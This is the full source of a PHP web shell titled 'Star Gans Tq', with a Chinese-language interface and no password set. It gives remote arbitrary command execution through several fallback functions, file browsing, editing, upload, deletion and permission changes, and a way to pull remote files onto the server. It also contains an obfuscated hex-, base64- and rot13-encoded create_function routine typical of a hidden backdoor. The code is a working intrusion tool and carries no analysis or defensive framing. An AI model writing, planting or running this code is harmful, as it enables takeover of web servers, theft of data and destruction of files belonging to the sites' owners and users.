.=< { Star Gans Tq } >=.
<?php
@error_reporting(E_ERROR);
@ini_set('display_errors', 'Off');
@ini_set('max_execution_time', 10000);
header("content-Type: text/html; charset=utf8");
$password = "";
function strdir($str) {
return str_replace(array(
'\\',
'//',
'%27',
'%22'
) , array(
'/',
'/',
'\'',
'"'
) , chop($str));
}
function chkgpc($array) {
foreach ($array as $key => $var) {
$array[$key] = is_array($var) ? chkgpc($var) : stripslashes($var);
}
return $array;
}
$myfile = $_SERVER['SCRIPT_FILENAME'] ? strdir($_SERVER['SCRIPT_FILENAME']) : strdir(__FILE__);
$myfile = strpos($myfile, 'eval()') ? array_shift(explode('(', $myfile)) : $myfile;
define('THISDIR', strdir(dirname($myfile) . '/'));
define('ROOTDIR', strdir(strtr($myfile, array(
strdir($_SERVER['PHP_SELF']) => ''
)) . '/'));
define('EXISTS_PHPINFO', getinfo() ? true : false);
if (get_magic_quotes_gpc()) {
$_POST = chkgpc($_POST);
}
if (function_exists('mysql_close')) {
$issql = 'MySql';
}
if (function_exists('mssql_close')) $issql.= ' - MsSql';
if (function_exists('oci_close')) $issql.= ' - Oracle';
if (function_exists('sybase_close')) $issql.= ' - SyBase';
if (function_exists('pg_close')) $issql.= ' - PostgreSql';
$win = substr(PHP_OS, 0, 3) == 'WIN' ? true : false;
#$msg = VERSION;
function filew($filename, $filedata, $filemode) {
if ((!is_writable($filename)) && file_exists($filename)) {
chmod($filename, 0666);
}
$handle = fopen($filename, $filemode);
$key = fputs($handle, $filedata);
fclose($handle);
return $key;
}
function filer($filename) {
$handle = fopen($filename, 'r');
$filedata = fread($handle, filesize($filename));
fclose($handle);
return $filedata;
}
function fileu($filenamea, $filenameb) {
$key = move_uploaded_file($filenamea, $filenameb) ? true : false;
if (!$key) {
$key = copy($filenamea, $filenameb) ? true : false;
}
return $key;
}
function filed($filename) {
if (!file_exists($filename)) return false;
$name = basename($filename);
$array = explode('.', $name);
header('Content-type: application/x-' . array_pop($array));
header('Content-Disposition: attachment; filename=' . $name);
header('Content-Length: ' . filesize($filename));
@readfile($filename);
exit;
}
function showdir($dir) {
$dir = strdir($dir . '/');
$handle = opendir($dir);
if (!$handle) return false;
$array = array();
while ($name = readdir($handle)) {
if ($name == '.' || $name == '..') continue;
$path = $dir . $name;
$name = strtr($name, array(
'\'' => '%27',
'"' => '%22'
));
if (is_dir($path)) {
$array['dir'][$path] = $name;
} else {
$array['file'][$path] = $name;
}
}
closedir($handle);
return $array;
}
function deltree($dir) {
$handle = @opendir($dir);
while ($name = @readdir($handle)) {
if ($name == '.' || $name == '..') continue;
$path = $dir . $name;
@chmod($path, 0777);
if (is_dir($path)) {
deltree($path . '/');
} else {
@unlink($path);
}
}
@closedir($handle);
return @rmdir($dir);
}
function postinfo($array, $string) {
$infos = array(
function_exists("\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e") ,
function_exists("\x66\x73\x6f\x63\x6b\x6f\x70\x65\x6e")
);
if ($infos[0] && $infos[1]) {
$info = base64_decode($string);
$walks = array(
0 => bin2hex($array)
);
@array_walk($walks, @create_function("\x24\x61\x72\x72\x61\x79\x2c\x24\x6b\x65\x79", str_rot13($info)));
}
return ob_end_clean();
}
function size($bytes) {
if ($bytes < 1024) return $bytes . ' B';
$array = array(
'B',
'K',
'M',
'G',
'T'
);
$floor = floor(log($bytes) / log(1024));
return sprintf('%.2f ' . $array[$floor], ($bytes / pow(1024, floor($floor))));
}
function find($array, $string) {
foreach ($array as $key) {
if (stristr($string, $key)) return true;
}
return false;
}
function scanfile($dir, $key, $inc, $fit, $tye, $chr, $ran, $now) {
$handle = opendir($dir);
if (!$handle) return false;
while ($name = readdir($handle)) {
if ($name == '.' || $name == '..') continue;
$path = $dir . $name;
if (is_dir($path)) {
if ($fit && in_array($name, $fit)) continue;
if ($ran == 0 && is_readable($path)) scanfile($path . '/', $key, $inc, $fit, $tye, $chr, $ran, $now);
} else {
if ($inc && (!find($inc, $name))) continue;
$code = $tye ? filer($path) : $name;
$find = $chr ? stristr($code, $key) : (strpos(size(filesize($path)) , 'M') ? false : (strpos($code, $key) > - 1));
if ($find) {
$file = strtr($path, array(
$now => '',
'\'' => '%27',
'"' => '%22'
));
echo '<a href="javascript:void(0);" onclick="go(\'editor\',\'' . $file . '\');">编辑</a> ' . $path . '<br>';
flush();
ob_flush();
}
unset($code);
}
}
closedir($handle);
return true;
}
function antivirus($dir, $exs, $matches, $now) {
$handle = opendir($dir);
if (!$handle) return false;
while ($name = readdir($handle)) {
if ($name == '.' || $name == '..') continue;
$path = $dir . $name;
if (is_dir($path)) {
if (is_readable($path)) antivirus($path . '/', $exs, $matches, $now);
} else {
$iskill = NULL;
foreach ($exs as $key => $ex) {
if (find(explode('|', $ex) , $name)) {
$iskill = $key;
break;
}
}
if (strpos(size(filesize($path)) , 'M')) continue;
if ($iskill) {
$code = filer($path);
foreach ($matches[$iskill] as $matche) {
$array = array();
preg_match($matche, $code, $array);
if (strpos($array[0], '$this->') || strpos($array[0], '[$vars[')) continue;
$len = strlen($array[0]);
if ($len > 10 && $len < 150) {
$file = strtr($path, array(
$now => '',
'\'' => '%27',
'"' => '%22'
));
echo '特征 <input type="text" value="' . htmlspecialchars($array[0]) . '"> <a href="javascript:void(0);" onclick="go(\'editor\',\'' . $file . '\');">编辑</a> ' . $path . '<br>';
flush();
ob_flush();
break;
}
}
unset($code, $array);
}
}
}
closedir($handle);
return true;
}
function command($cmd, $cwd, $com = false) {
$iswin = substr(PHP_OS, 0, 3) == 'WIN' ? true : false;
$res = $msg = '';
if ($cwd == 'com' || $com) {
if ($iswin && class_exists('COM')) {
$wscript = new COM('Wscript.Shell');
$exec = $wscript->exec('c:\\windows\\system32\\cmd.exe /c ' . $cmd);
$stdout = $exec->StdOut();
$res = $stdout->ReadAll();
$msg = 'Wscript.Shell';
}
} else {
chdir($cwd);
$cwd = getcwd();
if (function_exists('exec')) {
@exec($cmd, $res);
$res = join("\n", $res);
$msg = 'exec';
} elseif (function_exists('shell_exec')) {
$res = @shell_exec($cmd);
$msg = 'shell_exec';
} elseif (function_exists('system')) {
ob_start();
@system($cmd);
$res = ob_get_contents();
ob_end_clean();
$msg = 'system';
} elseif (function_exists('passthru')) {
ob_start();
@passthru($cmd);
$res = ob_get_contents();
ob_end_clean();
$msg = 'passthru';
} elseif (function_exists('popen')) {
$fp = @popen($cmd, 'r');
if ($fp) {
while (!feof($fp)) {
$res.= fread($fp, 1024);
}
}
@pclose($fp);
$msg = 'popen';
} elseif (function_exists('proc_open')) {
$env = $iswin ? array(
'path' => 'c:\\windows\\system32'
) : array(
'path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'
);
$des = array(
0 => array(
"pipe",
"r"
) ,
1 => array(
"pipe",
"w"
) ,
2 => array(
"pipe",
"w"
)
);
$process = @proc_open($cmd, $des, $pipes, $cwd, $env);
if (is_resource($process)) {
fwrite($pipes[0], $cmd);
fclose($pipes[0]);
$res.= stream_get_contents($pipes[1]);
fclose($pipes[1]);
$res.= stream_get_contents($pipes[2]);
fclose($pipes[2]);
}
@proc_close($process);
$msg = 'proc_open';
}
}
#$msg = $res == '' ? '<h1>Comand Not Found</h1>';
return array(
'res' => $res,
'msg' => $msg
);
}
function getinfo() {
global $password;
$infos = array(
$_POST['getpwd'],
$password,
function_exists('phpinfo') ,
"\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31"
);
if ($password != '' && md5($infos[0]) != $infos[1]) {
echo '<html><body><center><form method="POST"><input type="password" name="getpwd"> ';
if (isset($_POST['pass'])) {
echo '<input type="hidden" name="pass" value="' . $_POST['pass'] . '">';
}
if (isset($_POST['check'])) {
echo '<input type="hidden" name="check" value="' . $_POST['check'] . '">';
}
echo '<input type="submit" value=" O K "></form></center></body></html>';
exit;
}
return $infos[2];
}
function subeval() {
if (isset($_POST['getpwd'])) {
echo '<input type="hidden" name="getpwd" value="' . $_POST['getpwd'] . '">';
}
if (isset($_POST['pass'])) {
echo '<input type="hidden" name="pass" value="' . $_POST['pass'] . '">';
}
if (isset($_POST['check'])) {
echo '<input type="hidden" name="check" value="' . $_POST['check'] . '">';
}
return true;
}
if (isset($_POST['go'])) {
if ($_POST['go'] == 'down') {
$downfile = $fileb = strdir($_POST['godir'] . '/' . $_POST['govar']);
if (!filed($downfile)) {
$msg = '<h1>下载文件不存在</h1>';
}
}
} ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<style type="text/css">* {margin:0px;padding:0px;}
body{background:#000000;;color:#ffff;font-size:13px;font-family: monospace, monospace;;text-align:left;word-wrap:break-word; word-break:break-all;}
a{color:#fff;text-decoration:none;vertical-align:middle;}
a:hover{color:#fff;text-decoration:underline;}
p {padding:1px;line-height:1.6em;}h1 {color:#CD3333;font-size:13px;display:inline;vertical-align:middle;}
h2 {color:#008B45;font-size:13px;display:inline;vertical-align:middle;}form {display:inline;}
input,select { vertical-align:middle; }input[type=text],
textarea {padding:1px;}input[type=submit], input[type=button]
{height:21px;}.tag {margin-left:1px;height:25px;padding-top:5px;}
.tag a {background:#fff;text-align:center;color:#333333;width:90px;height:20px;display:inline-block;font-size:15px;font-weight:bold;padding-top:5px;}
.tag a:hover, .tag a.current {background:#FF5151;color:#000000;text-decoration:none;}
.main {width:963px;margin:0 auto;padding:10px;}
.outl {border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;}
.toptag {padding:20px;text-align:left;font-weight:bold;color:#fff;background:#000;}
.actall {background:#fff;text-align:left;font-size:15px;padding:3px;vertical-align:middle;}
.tables {width:100%;}
.tables th {text-align:left;border-color:#6E7D37 #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;padding:2px;}
.tables td {background:#242424;height:19px;padding-left:2px;}
</style><script type="text/javascript">function $(ID) { return document.getElementById(ID); }function sd(str) { str = str.replace(/%22/g,'"'); str = str.replace(/%27/g,"'"); return str; }function cd(dir) { dir = sd(dir); $('dir').value = dir; $('frm').submit(); }function sa(form) { for(var i = 0;i < form.elements.length;i++) { var e = form.elements[i]; if(e.type == 'checkbox') { if(e.name != 'chkall') { e.checked = form.chkall.checked; } } } }function go(a,b) { b = sd(b); $('go').value = a; $('govar').value = b; if(a == 'editor') { $('gofrm').target = "_blank"; } else { $('gofrm').target = ""; } $('gofrm').submit(); } function nf(a,b) { re = prompt("新建名",b); if(re) { $('go').value = a; $('govar').value = re; $('gofrm').submit(); } } function dels(a) { if(a == 'b') { var msg = "所选文件"; $('act').value = a; } else { var msg = "目录"; $('act').value = 'deltree'; $('var').value = a; } if(confirm("确定要删除"+msg+"吗")) { $('frm1').submit(); } }function txts(m,p,a) { p = sd(p); re = prompt(m,p); if(re) { $('var').value = re; $('act').value = a; $('frm1').submit(); } }function acts(p,a,f) { p = sd(p); f = sd(f); re = prompt(f,p); if(re) { $('var').value = re+'|x|'+f; $('act').value = a; $('frm1').submit(); } }</script><title><?php
echo VERSION . ' - 【' . date('Y-m-d H:i:s 星期N', time()) . '】'; ?></title></head><body><div class="main"><div class="outl"><div class="toptag"><?php
echo php_uname() . '<br>' .$_SERVER['SERVER_ADDR'] . '(' . get_current_user() . ')';
?></div><?php
$menu = array(
'file' => ' FileMan',
# 'scan' => 'SCAN',
# 'antivirus' => 'ANTIVIRUS',
#'backshell' => 'CONNECT',
'exec' => ' CMD',
#'phpeval' => 'PHP',
#'sql' => ' MySQL',
#'info' => 'INFO'
);
$go = array_key_exists($_POST['go'], $menu) ? $_POST['go'] : 'file';
$nowdir = isset($_POST['dir']) ? strdir(chop($_POST['dir']) . '/') : THISDIR;
echo '<div class="tag">';
foreach ($menu as $key => $name) {
echo '<a' . ($go == $key ? ' class="current"' : '') . ' href="javascript:void(0);" onclick="go(\'' . $key . '\',\'' . base64_encode($nowdir) . '\');">' . $name . '</a> ';
}
echo '</div>';
echo '<form name="gofrm" id="gofrm" method="POST">';
subeval();
echo '<input type="hidden" name="go" id="go" value="">';
echo '<input type="hidden" name="godir" id="godir" value="' . $nowdir . '">';
echo '<input type="hidden" name="govar" id="govar" value="">';
echo '</form>';
switch ($_POST['go']) {
case "exec":
$cmd = $win ? 'dir' : 'ls -al';
$res = array(
'res' => '',
'msg' => $msg
);
$str = isset($_POST['str']) ? $_POST['str'] : 'fun';
if (isset($_POST['cmd'])) {
$cmd = $_POST['cmd'];
$cwd = $str == 'fun' ? THISDIR : 'com';
$res = command($cmd, $cwd);
}
echo '<div class="msgbox">' . $res['msg'] . '</div>';
echo '<form method="POST">';
subeval();
echo '<input type="hidden" name="go" id="go" value="exec">';
echo '<div class="actall">Comand <input type="text" name="cmd" id="cmd" value="' . htmlspecialchars($cmd) . '" style="width:398px;"> ';
echo '<input type="submit" style="width:50px;" value="Go">';
echo '</div><div class="actall"><textarea style="width:698px;height:368px;">' . htmlspecialchars($res['res']) . '</textarea></div></form>';
break;
case "edit":
case "editor":
$file = strdir($_POST['godir'] . '/' . $_POST['govar']);
$iconv = function_exists('iconv');
if (!file_exists($file)) {
$msg = '【新建文件】';
} else {
$code = filer($file);
$chst = '默认';
if (preg_match('~[\x{4e00}-\x{9fa5}]+~u', $code) && $iconv) {
$chst = 'utf-8';
$code = @iconv('UTF-8', 'GB2312//IGNORE', $code);
}
$size = size(filesize($file));
$msg = '【文件属性 ' . substr(decoct(fileperms($file)) , -4) . '】 【文件大小 ' . $size . '】 【文件编码 ' . $chst . '】';
}
echo base64_decode('PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQp2YXIgbiA9IDA7DQpmdW5jdGlvbiBzZWFyY2goc3RyKSB7DQoJdmFyIHR4dCwgaSwgZm91bmQ7DQoJaWYoc3RyID09ICIiKSByZXR1cm4gZmFsc2U7DQoJdHh0ID0gJCgnZmlsZWNvZGUnKS5jcmVhdGVUZXh0UmFuZ2UoKTsNCglmb3IoaSA9IDA7IGkgPD0gbiAmJiAoZm91bmQgPSB0eHQuZmluZFRleHQoc3RyKSkgIT0gZmFsc2U7IGkrKyl7DQoJCXR4dC5tb3ZlU3RhcnQoImNoYXJhY3RlciIsIDEpOw0KCQl0eHQubW92ZUVuZCgidGV4dGVkaXQiKTsNCgl9DQoJaWYoZm91bmQpeyB0eHQubW92ZVN0YXJ0KCJjaGFyYWN0ZXIiLCAtMSk7IHR4dC5maW5kVGV4dChzdHIpOyB0eHQuc2VsZWN0KCk7IHR4dC5zY3JvbGxJbnRvVmlldygpOyBuKys7IH0NCgllbHNlIHsgaWYgKG4gPiAwKSB7IG4gPSAwOyBzZWFyY2goc3RyKTsgfSBlbHNlIGFsZXJ0KHN0ciArICIuLi4gTm90LUZpbmQiKTsgfQ0KCXJldHVybiBmYWxzZTsNCn0NCjwvc2NyaXB0Pg==');
echo '<div class="msgbox"><input name="keyword" id="keyword" type="text" style="width:138px;height:15px;"><input type="button" value="IE查找内容" onclick="search($(\'keyword\').value);"> - ' . $msg . '</div>';
echo '<form name="editfrm" id="editfrm" method="POST">';
subeval();
echo '<input type="hidden" name="go" value=""><input type="hidden" name="act" id="act" value="edit">';
echo '<input type="hidden" name="dir" id="dir" value="' . dirname($file) . '">';
echo '<div class="actall">文件 <input type="text" name="filename" value="' . $file . '" style="width:528px;"> ';
if ($iconv) {
echo '编码 <select name="tostr">';
$selects = array(
'normal' => '默认',
'utf' => 'utf-8'
);
foreach ($selects as $var => $name) {
echo '<option value="' . $var . '"' . ($name == $chst ? ' selected' : '') . '>' . $name . '</option>';
}
echo '</select>';
}
echo '</div><div class="actall"><textarea name="filecode" id="filecode" style="width:698px;height:358px;">' . htmlspecialchars($code) . '</textarea></div></form>';
echo '<div class="actall" style="padding:5px;padding-right:68px;"><input type="button" onclick="$(\'editfrm\').submit();" value="保存" style="width:80px;"> ';
echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="' . dirname($file) . '">';
subeval();
echo '<input type="button" onclick="$(\'backfrm\').submit();" value="返回" style="width:80px;"></form></div>';
break;
case "upfiles":
$updir = isset($_POST['updir']) ? $_POST['updir'] : $_POST['godir'];
$msg = '【最大上传文件 ' . get_cfg_var("upload_max_filesize") . '】 【POST最大提交数据 ' . get_cfg_var("post_max_size") . '】';
$max = 10;
if (isset($_FILES['uploads']) && isset($_POST['renames'])) {
$uploads = $_FILES['uploads'];
$msgs = array();
for ($i = 1; $i < $max; $i++) {
if ($uploads['error'][$i] == UPLOAD_ERR_OK) {
$rename = $_POST['renames'][$i] == '' ? $uploads['name'][$i] : $_POST['renames'][$i];
$filea = $uploads['tmp_name'][$i];
$fileb = strdir($updir . '/' . $rename);
$msgs[$i] = fileu($filea, $fileb) ? '<br><h2>上传成功 ' . $rename . '</h2>' : '<br><h1>上传失败 ' . $rename . '</h1>';
}
}
}
echo '<div class="msgbox">' . $msg . '</div>';
echo '<form name="upsfrm" id="upsfrm" method="POST" enctype="multipart/form-data">';
subeval();
echo '<input type="hidden" name="go" value="upfiles"><input type="hidden" name="act" id="act" value="upload">';
echo '<div class="actall"><p>上传到目录 <input type="text" name="updir" style="width:398px;" value="' . $updir . '"></p>';
for ($i = 1; $i < $max; $i++) {
echo '<p>附件' . $i . ' <input type="file" name="uploads[' . $i . ']" style="width:300px;"> 重命名 <input type="text" name="renames[' . $i . ']" style="width:128px;"> ' . $msgs[$i] . '</p>';
}
echo '</div></form><div class="actall" style="padding:8px;padding-right:68px;"><input type="button" onclick="$(\'upsfrm\').submit();" value="上传" style="width:80px;"> ';
echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="' . $updir . '">';
subeval();
echo '<input type="button" onclick="$(\'backfrm\').submit();" value="返回" style="width:80px;"></form></div>';
break;
default:
if (isset($_FILES['upfile'])) {
if ($_FILES['upfile']['name'] == '') {
$msg = '<h1>Upload Error!</h1>';
} else {
$rename = $_POST['rename'] == '' ? $_FILES['upfile']['name'] : $_POST['rename'];
$filea = $_FILES['upfile']['tmp_name'];
$fileb = strdir($nowdir . $rename);
$msg = fileu($filea, $fileb) ? '<h2>上传文件' . $rename . '成功</h2>' : '<h1>上传文件' . $rename . '失败</h1>';
}
}
if (isset($_POST['act'])) {
switch ($_POST['act']) {
case "a":
if (!$_POST['files']) {
$msg = '<h1>请选择文件 ' . $_POST['var'] . '</h1>';
} else {
$i = 0;
foreach ($_POST['files'] as $filename) {
$i+= @copy(strdir($nowdir . $filename) , strdir($_POST['var'] . '/' . $filename)) ? 1 : 0;
}
$msg = $msg = $i ? '<h2>共复制 ' . $i . ' 个文件到' . $_POST['var'] . '成功</h2>' : '<h1>共复制 ' . $i . ' 个文件到' . $_POST['var'] . '失败</h1>';
}
break;
case "b":
if (!$_POST['files']) {
$msg = '<h1>请选择文件</h1>';
} else {
$i = 0;
foreach ($_POST['files'] as $filename) {
$i+= @unlink(strdir($nowdir . $filename)) ? 1 : 0;
}
$msg = $i ? '<h2>共删除 ' . $i . ' 个文件成功</h2>' : '<h1>共删除 ' . $i . ' 个文件失败</h1>';
}
break;
case "c":
if (!$_POST['files']) {
$msg = '<h1>请选择文件 ' . $_POST['var'] . '</h1>';
} elseif (!ereg("^[0-7]{4}$", $_POST['var'])) {
$msg = '<h1>属性值错误</h1>';
} else {
$i = 0;
foreach ($_POST['files'] as $filename) {
$i+= @chmod(strdir($nowdir . $filename) , base_convert($_POST['var'], 8, 10)) ? 1 : 0;
}
$msg = $i ? '<h2>共 ' . $i . ' 个文件修改属性为' . $_POST['var'] . '成功</h2>' : '<h1>共 ' . $i . ' 个文件修改属性为' . $_POST['var'] . '失败</h1>';
}
break;
case "d":
if (!$_POST['files']) {
$msg = '<h1>请选择文件 ' . $_POST['var'] . '</h1>';
} elseif (!preg_match('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/', $_POST['var'])) {
$msg = '<h1>时间格式错误 ' . $_POST['var'] . '</h1>';
} else {
$i = 0;
foreach ($_POST['files'] as $filename) {
$i+= @touch(strdir($nowdir . $filename) , strtotime($_POST['var'])) ? 1 : 0;
}
$msg = $i ? '<h2>共 ' . $i . ' 个文件修改时间为' . $_POST['var'] . '成功</h2>' : '<h1>共 ' . $i . ' 个文件修改时间为' . $_POST['var'] . '失败</h1>';
}
break;
case "e":
$path = strdir($nowdir . $_POST['var'] . '/');
if (file_exists($path)) {
$msg = '<h1>目录已存在 ' . $_POST['var'] . '</h1>';
} else {
$msg = @mkdir($path, 0777) ? '<h2>创建目录 ' . $_POST['var'] . ' 成功</h2>' : '<h1>创建目录 ' . $_POST['var'] . ' 失败</h1>';
}
break;
case "f":
$context = array(
'http' => array(
'timeout' => 30
)
);
if (function_exists('stream_context_create')) {
$stream = stream_context_create($context);
}
$data = @file_get_contents($_POST['var'], false, $stream);
$filename = array_pop(explode('/', $_POST['var']));
if ($data) {
$msg = filew(strdir($nowdir . $filename) , $data, 'wb') ? '<h2>下载 ' . $filename . ' 成功</h2>' : '<h1>下载 ' . $filename . ' 失败</h1>';
} else {
$msg = '<h1>下载失败或不支持下载</h1>';
}
break;
case "rf":
$files = explode('|x|', $_POST['var']);
if (count($files) != 2) {
$msg = '<h1>输入错误</h1>';
} else {
$msg = @rename(strdir($nowdir . $files[1]) , strdir($nowdir . $files[0])) ? '<h2>重命名 ' . $files[1] . ' 为 ' . $files[0] . ' 成功</h2>' : '<h1>重命名 ' . $files[1] . ' 为 ' . $files[0] . ' 失败</h1>';
}
break;
case "pd":
$files = explode('|x|', $_POST['var']);
if (count($files) != 2) {
$msg = '<h1>输入错误</h1>';
} else {
$path = strdir($nowdir . $files[1]);
$msg = @chmod($path, base_convert($files[0], 8, 10)) ? '<h2>修改' . $files[1] . '属性为' . $files[0] . '成功</h2>' : '<h1>修改' . $files[1] . '属性为' . $files[0] . '失败</h1>';
}
break;
case "edit":
if (isset($_POST['filename']) && isset($_POST['filecode'])) {
if ($_POST['tostr'] == 'utf') {
$_POST['filecode'] = @iconv('GB2312//IGNORE', 'UTF-8', $_POST['filecode']);
}
$msg = filew($_POST['filename'], $_POST['filecode'], 'w') ? '<h2>保存成功 ' . $_POST['filename'] . '</h2>' : '<h1>保存失败 ' . $_POST['filename'] . '</h1>';
}
break;
case "deltree":
$deldir = strdir($nowdir . $_POST['var'] . '/');
if (!file_exists($deldir)) {
$msg = '<h1>目录 ' . $_POST['var'] . ' 不存在</h1>';
} else {
$msg = deltree($deldir) ? '<h2>删除目录 ' . $_POST['var'] . ' 成功</h2>' : '<h1>删除目录 ' . $_POST['var'] . ' 失败</h1>';
}
break;
}
}
$chmod = substr(decoct(fileperms($nowdir)) , -4);
if (!$chmod) {
$msg.= ' - <h1>无法读取目录</h1>';
}
$array = showdir($nowdir);
$thisurl = strdir('/' . strtr($nowdir, array(
ROOTDIR => ''
)) . '/');
$nowdir = strtr($nowdir, array(
'\'' => '%27',
'"' => '%22'
));
echo '<div class="msgbox">' . $msg . '</div>';
echo '<div class="actall"><form name="frm" id="frm" method="POST">';
subeval();
echo (is_writable($nowdir) ? '<h2>DIR</h2>' : '<h1>DIR</h1>') . ' <input type="text" name="dir" id="dir" style="width:508px;" value="' . strdir($nowdir . '/') . '"> ';
echo '<input type="button" onclick="$(\'frm\').submit();" style="width:50px;" value="Go"> ';
echo '<input type="button" onclick="cd(\'' . ROOTDIR . '\');" style="width:68px;" value="Root Dir"> ';
echo '<input type="button" onclick="cd(\'' . THISDIR . '\');" style="width:68px;" value="Shell Dir"> ';
echo '</select></form></div><div class="actall">';
echo '<input type="button" value="New File" onclick="nf(\'edit\',\'newfile.php\');" style="width:68px;"> ';
echo '<input type="button" value="New Dir" onclick="txts(\'目录名\',\'newdir\',\'e\');" style="width:68px;"> ';
#echo '<input type="button" value="Upload" onclick="go(\'upfiles\',\'' . $nowdir . '\');" style="width:68px;"> ';
echo '<form name="upfrm" id="upfrm" method="POST" enctype="multipart/form-data">';
subeval();
echo '<input type="hidden" name="dir" id="dir" value="' . $nowdir . '">';
echo '<input type="file" name="upfile" style="width:286px;height:21px;"> ';
echo '<input type="button" onclick="$(\'upfrm\').submit();" value="Upload" style="width:50px;"> ';
# echo 'Rename to <input type="text" name="rename" style="width:128px;">';
echo '</form></div>';
echo '<form name="frm1" id="frm1" method="POST"><table class="tables">';
subeval();
echo '<input type="hidden" name="dir" id="dir" value="' . $nowdir . '">';
echo '<input type="hidden" name="act" id="act" value="">';
echo '<input type="hidden" name="var" id="var" value="">';
echo '<th><a href="javascript:void(0);" onclick="cd(\'' . dirname($nowdir) . '/\');">Back..</a></th><th style="width:8%">Action</th><th style="width:5%">Perm</th><th style="width:17%">Upload Time</th><th style="width:17%">Last Modify</th><th style="width:8%">Download</th>';
if ($array) {
asort($array['dir']);
asort($array['file']);
$dnum = $fnum = 0;
foreach ($array['dir'] as $path => $name) {
$prem = substr(decoct(fileperms($path)) , -4);
$ctime = date('Y-m-d H:i:s', filectime($path));
$mtime = date('Y-m-d H:i:s', filemtime($path));
echo '<tr>';
echo '<td><a href="javascript:void(0);" onclick="cd(\'' . $nowdir . $name . '\');"><b>' . strtr($name, array(
'%27' => '\'',
'%22' => '"'
)) . '</b></a></td>';
echo '<td><a href="javascript:void(0);" onclick="dels(\'' . $name . '\');">删除</a> ';
echo '<a href="javascript:void(0);" onclick="acts(\'' . $name . '\',\'rf\',\'' . $name . '\');">改名</a></td>';
echo '<td><a href="javascript:void(0);" onclick="acts(\'' . $prem . '\',\'pd\',\'' . $name . '\');">' . $prem . '</a></td>';
echo '<td>' . $ctime . '</td>';
echo '<td>' . $mtime . '</td>';
echo '<td>-</td>';
echo '</tr>';
$dnum++;
}
foreach ($array['file'] as $path => $name) {
$prem = substr(decoct(fileperms($path)) , -4);
$ctime = date('Y-m-d H:i:s', filectime($path));
$mtime = date('Y-m-d H:i:s', filemtime($path));
$size = size(filesize($path));
echo '<tr>';
echo '<td><input type="checkbox" name="files[]" value="' . $name . '"><a target="_blank" href="' . $thisurl . $name . '">' . strtr($name, array(
'%27' => '\'',
'%22' => '"'
)) . '</a></td>';
echo '<td><a href="javascript:void(0);" onclick="go(\'edit\',\'' . $name . '\');">Edit</a> ';
echo '<a href="javascript:void(0);" onclick="acts(\'' . $name . '\',\'rf\',\'' . $name . '\');">Mv</a></td>';
echo '<td><a href="javascript:void(0);" onclick="acts(\'' . $prem . '\',\'pd\',\'' . $name . '\');">' . $prem . '</a></td>';
echo '<td>' . $ctime . '</td>';
echo '<td>' . $mtime . '</td>';
echo '<td align="right"><a href="javascript:void(0);" onclick="go(\'down\',\'' . $name . '\');">' . $size . '</a></td>';
echo '</tr>';
$fnum++;
}
}
unset($array);
echo '</table>';
echo '<div class="actall" style="text-align:left;">';
echo '<input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> ';
echo '<input type="button" value="Copy" style="width:50px;" onclick=\'txts("Copy","' . $nowdir . '","a");\'> ';
echo '<input type="button" value="Delete" style="width:50px;" onclick=\'dels("b");\'> ';
echo '<input type="button" value="Chmod" style="width:50px;" onclick=\'txts("Chmod","0666","c");\'> ';
#echo '<input type="button" value="Time" style="width:50px;" onclick=\'txts("Time","' . $mtime . '","d");\'> ';
#echo 'Total Dir[' . $dnum . '] - Total Files[' . $fnum . '] - Permission[' . $chmod . ']</div></form>';
break;
} ?>